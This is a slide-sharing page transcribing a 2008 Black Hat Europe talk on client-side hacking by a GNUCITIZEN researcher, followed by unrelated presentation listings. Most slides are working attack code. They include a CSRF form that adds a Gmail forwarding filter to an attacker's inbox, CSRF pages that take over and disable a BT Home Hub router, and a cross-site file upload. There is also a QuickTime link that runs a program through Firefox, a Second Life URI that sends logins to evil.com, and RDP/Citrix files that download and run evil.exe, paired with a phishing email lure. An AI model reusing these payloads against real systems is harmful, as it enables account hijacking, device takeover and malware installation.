cutting edge think tank
play

Cutting-edge Think Tank BLACK HAT EUROPE 2008 CLIENT-SIDE SECURITY - PowerPoint PPT Presentation

Dec 23, 2023 •341 likes •948 views

Cutting-edge Think Tank BLACK HAT EUROPE 2008 CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques pdp Information Security Researcher, founder of the GNUCITIZEN group OBJECTIVES I was planning to...

  2. Cutting-edge Think Tank

  3. BLACK HAT EUROPE 2008

  4. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  5. pdp Information Security Researcher, founder of the GNUCITIZEN group

  6. OBJECTIVES  I was planning to...  Research Design Issues  Innovate  Mix & Match Ideas

  7. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  8. THE GMAIL HIJACK TECHNIQUE

  9. THE GMAIL HIJACK TECHNIQUE

  10. THE GMAIL HIJACK TECHNIQUE

  11. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility  http://www.gnucitizen.org/util/csrf ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  12. THE GMAIL HIJACK TECHNIQUE  HTML Code  <html> <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  13. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  14. PWNING BT HOME HUB  Enable Remote Assistance  <html> <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//? ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  15. PWNING BT HOME HUB  Disable Wireless Connectivity  <html> <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  16. PWNING BT HOME HUB  Call Jacking  POST http://api.home/cgi/b/_voip_/stats//? ce=1&be=0&l0=-1&l1=-1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  17. PWNED!!! Thanks to AP!!!

  18. PWNED!!! SNOM .mario hacked Snom

  19. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method  <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D %0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form- data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D %0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  20. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method  <form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  21. QUICKTIME PWNS FIREFOX  QuickTime Media Links  <?xml version="1.0"> <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  22. QUICKTIME PWNS FIREFOX  The Exploit  <?xml version="1.0"> <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local; 1'].createInstance(Components.interfaces.nsILocalFile);file.initWit hPath('c:\\windows\\system32\\calc.exe');process=Components.classes ['@mozilla.org/process/util; 1'].createInstance(Components.interfaces.nsIProcess);process.init(f ile);process.run(true,[],0);void(0); "/>

  23. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  24. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  25. IE PWNS SECOND LIFE  Avatar Theft  [HTTP_RAW_POST_DATA] => <methodCall> <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  26. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  27. ALL YOUR AVATARS ARE BELONG TO US!!!

  28. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA  [WFClient] Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  29. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

  30. Hello John, This is Tim from Tech Department. I was informed that you have some problems with your remote desktop connectivity. I’ve attached a modified RDP file you can tryout and see if it works. Just double click on the file and login. Your domain credentials should work. Let me know if you have any problems. Tim O’Brian Tech Department

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  The Evil One  [WFClient] Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] AutoLogonAllowed=On UseLocalUserAndPassword=On InitialProgram=cmd.exe /C "tftp -i evil.com GET evil.exe evil.exe & evil.exe" ScreenPercent=0 CITRIX auto-start  In an iFrame  <iframe src="http://evil.com/path/to/evil.ica"></ iframe>

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think

RISK 2008 pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure We have

1.04k views • 52 slides
Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013

Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013

Leadership Day Christchurch 20 th November 2012 Cutting Edge 2012 School of Addiction 2013 Cutting Edge 2013 Practitioner Registration Cutting Edge 2012 Relevant: 97.5% Enjoyable: 99% Recommend: 89% Cost reasonable 80%

255 views • 21 slides
B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint

B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint

B W ll L Be Well Lecture Series: t S i Cutting-edge Joint Replacement Cutting edge Joint Replacement Technologies and Advances in Functional Outcomes for Arthritis Patients Patients D David C. Ayers MD id C A MD Patricia Franklin MD,

713 views • 57 slides
DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus

DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus

The Digital Campus DRAFT Florida Polytechnic University IT Vision Flexible, Nimble, Cutting Edge Campus Todays Discussion How to create the Flexible, Nimble, Cutting Edge Campus for Today and Tomorrow! 1. Current Progress on Board

1.28k views • 57 slides
CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure

929 views • 64 slides
Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1

Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1

10/21/2013 Cutting Edge Options for Winter Operations 2013 www.ttspec.com The Good Old Days 1 10/21/2013 1 st Truck I Ever Specd Out First One Butch Specd Out 2 10/21/2013 Pre-Underbody Scraper What sort of cutting edge is

355 views • 23 slides
Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS

Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS

Cutting edge Forum on Autonomous Driving, Contributions from Intelligent Robotics, AI and ITS AD19 2019 IEEE/RSJ International Conference on Intelligent Robots and Systems Cutting edge Forum on Autonomous Driving Contributions from Intelligent

191 views • 5 slides
20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD

20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD

20 th anniversary Serving drug discovery with cutting-edge software Dra Barna, PhD Application Scientist Live Chemistry in Microsoft Office Structure representation Chemical search R-group decomposition Import from files or databases

506 views • 13 slides
Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of

Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of

Cutting Edge Techniques in Hip Anesthesia: Blocks and Beyond! Sonia Szlyk, MD Director of Regional Anesthesia North American Partners in Anesthesia, Mid-Atlantic Division INOVA Fair Oaks Hospital, VA Disclosure National Speakers

518 views • 23 slides
Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation

Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation

Qualifying Frac Sand Resources Using Cutting Edge Technology Sample prep &amp; handling Data correlation PSD as decision tool PSD for fingerprinting Conclusions Camsizer Quick Reliable 21 st Century

764 views • 60 slides
MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge

MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge

MACHINE LEARNING MEETUP thinking outside the box horse chestnut good looking cutting edge More than one word (multiword) Meaning more than sum of the individual words Idioms More than meets the eye Phrasal Verbs Kick things off

707 views • 35 slides
Who We Cutting Edge Communications is a data collection services Are company for use in

Who We Cutting Edge Communications is a data collection services Are company for use in

5/4/2020 Providing Real Time, Mission Critical Data Helen Knox helen@cecsurveys.com (O) 713-827-0101 (C) 281-536-8696 1 Helen Knox Kevin Casebolt Brandon Lemley Who We Cutting Edge Communications is a data collection services Are

284 views • 6 slides
Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About

Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About

Empowering School Districts with Cutting Edge Soft Skills Ecosystems Can You Tell Us More About Simply Success? Ed Tech Company of the Year 2017 Industry Leading Soft Skills Training Provider Creator of SIPS Instructional Method

302 views • 15 slides
Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven

Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven

Win More Business &amp; Accelerate Profits : - InMarket Leads - Cutting Edge Data-Driven Marketing That Your Competitors Dont Even Know AboutYet. Right Now, there are hundreds of people searching for Franchise Consulting Services Can

650 views • 30 slides
F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General

F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General

F Freiburg_bioware ib bi Universal endonuclease cutting edge technology g g gy General Idea Programmable Restriction Endonuclease g Motivation: T Too many restriction enzymes t i ti Short recognition sites Too many cuts

435 views • 40 slides
MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO:

MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO:

MAKING THE MOST OF THE 2011-12 WINDOW OF OPPORTUNITY: TWO CUTTING EDGE TECHNIQUES PRESENTED TO: TIGER 21, GROUP DALLAS 02 September 9, 2011 Marvin E. Blum Steven W. Novak THE BLUM FIRM, P.C. 777 MAIN STREET, SUITE 700 FORT WORTH, TEXAS

200 views • 17 slides
Types of Chemical Reactions Vanderbilt Student Volunteers for Science Training Presentation

Types of Chemical Reactions Vanderbilt Student Volunteers for Science Training Presentation

Types of Chemical Reactions Vanderbilt Student Volunteers for Science Training Presentation 2018-2019 VINSE/VSVS Rural Important!!! Please use this resource to reinforce your understanding of the lesson! Make sure you have read and

240 views • 11 slides
Introducing MANIFEST.MF Eclipse Plug-ins 2 plugin.xml OSGi MANIFEST.MF

Introducing MANIFEST.MF Eclipse Plug-ins 2 plugin.xml OSGi MANIFEST.MF

Contents OSGi Introducing MANIFEST.MF Eclipse Plug-ins 2 plugin.xml OSGi MANIFEST.MF Manifest-Version: 1.0 OSGi is a Java-based framework targeted Bundle-ManifestVersion: 2 for use by systems that require long Bundle-Name:

280 views • 5 slides
Overview Introducing Young Achievers Who we are Vision and objectives Motto 3

Overview Introducing Young Achievers Who we are Vision and objectives Motto 3

Overview Introducing Young Achievers Who we are Vision and objectives Motto 3 skills Activities Consol Solar Jar Project Statistics of Shack fires Aims and objectives of the Project What happened so far

222 views • 21 slides
Process and Objective of the Joint Annual Review Dr. Tirtha Raj Burlakoti Chief Specialist-

Process and Objective of the Joint Annual Review Dr. Tirtha Raj Burlakoti Chief Specialist-

Process and Objective of the Joint Annual Review Dr. Tirtha Raj Burlakoti Chief Specialist- PPICD, MoHP Joint Annual Review Statement of Intent signed in 2004 to initiate Health SWAp Joint Annual Review meeting is a joint forum of MoHP,

246 views • 11 slides
Integra(ng Real-(me GIS and Social Media for Qualita(ve Transporta(on

Integra(ng Real-(me GIS and Social Media for Qualita(ve Transporta(on

Integra(ng Real-(me GIS and Social Media for Qualita(ve Transporta(on Data Collec(on PI: Dr. Hongmian Gong Co-PI: Dr. Carsten Kessler Mario Giampieri Why social

619 views • 33 slides
METHODS OF KNOWLEDGE ENGINEERING PROJECT SUMMARY Janusz Tomasik, AGH UST, summer 2016 Table of

METHODS OF KNOWLEDGE ENGINEERING PROJECT SUMMARY Janusz Tomasik, AGH UST, summer 2016 Table of

METHODS OF KNOWLEDGE ENGINEERING PROJECT SUMMARY Janusz Tomasik, AGH UST, summer 2016 Table of contents Introduction 1. Data exploration 2. The kNN method with cross-validation 3. Self-Organizing Maps 4. Associated Graph Data Structure

630 views • 25 slides
How to measure Soil texture and stone content growobservatory.org You need: A glass jar

How to measure Soil texture and stone content growobservatory.org You need: A glass jar

How to measure Soil texture and stone content growobservatory.org You need: A glass jar A trowel A spade Some paper A 2mm sieve A mortar A permanent marker A ruler A teaspoon of SHMP Sodium

431 views • 39 slides
NLE Math Olympiads Information Night NLE PICOs Kareena Nair, Ritu Walia August 28, 2019

NLE Math Olympiads Information Night NLE PICOs Kareena Nair, Ritu Walia August 28, 2019

NLE Math Olympiads Information Night NLE PICOs Kareena Nair, Ritu Walia August 28, 2019 Math Olympiads (MOEMs) Math Olympiads for Elementary and Middle Schools (MOEMs) is a large and popular mathematics competition for students in

649 views • 12 slides

More recommend